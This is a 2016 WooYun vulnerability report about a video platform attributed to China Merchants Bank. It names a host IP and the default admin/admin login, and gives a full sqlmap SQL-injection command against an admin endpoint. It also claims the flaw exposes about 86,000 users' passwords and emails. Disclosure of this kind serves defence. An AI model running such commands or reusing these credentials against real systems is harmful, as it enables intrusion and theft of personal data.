当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0194868

漏洞标题:招商银行视讯平台漏洞

相关厂商:招商银行

漏洞作者: 苦咖啡

提交时间:2016-04-11 09:35

修复时间:2016-04-12 11:10

公开时间:2016-04-12 11:10

漏洞类型:用户资料大量泄漏

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-11: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没什么说的就是一套视频直播系统 看起来还不错!!~~~

详细说明:

入口地址http://122.112.15.197 因为没有安全验证码 导致暴力破解出 账号admin密码admin的弱口令
进入系统看见上传点本来想的是直接上传脚本SHELL
但是看见文件格式做了限制 也难得去研究绕过了!!~~
上BURP看见很多POST随便拿一个
sqlmap.py -u "http://122.112.15.197/admin/user/inituserinfo.p
hp?username=admin&groupname=100000" --cookie "100000-admin=success; http://122.1
12.15.197/admin/upload.html?name=admin&gname=100000curtab=%23my-upload-tab;http:
//122.112.15.197/admin/channel.html?name=admin&gname=100000curtab=%23passway323;
jstree_select=%23tree_node_7;jstree_open=%23tree_node_2%2C%23tree_node_7; jstre
e_load=" --data "username=admin" -p username

捕获.PNG


此注入点支持union 而且权限很大 可以直接写SHELL

漏洞证明:

哎呀 浏览器出问题了 本来想在截图个的都没法了
用户数量8.6W 编辑每个用户的信息可以实现遍历
每个用户包含的信息有:
用户名(其实就是每个员工的真名缩写)(其实这8W多用户名估计是招行的所有系统几乎通用的用户名形式)
用户密码
用户邮箱
不看了 夜深了 睡觉了!!~~~本来想SHELL证明下的 算了

修复方案:

版权声明:转载请注明来源 苦咖啡@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-12 11:10

厂商回复:

感谢你对招行的关注,经过确认非招行地址,已经通知相关负责人处理。

最新状态:

暂无


漏洞评价:

评价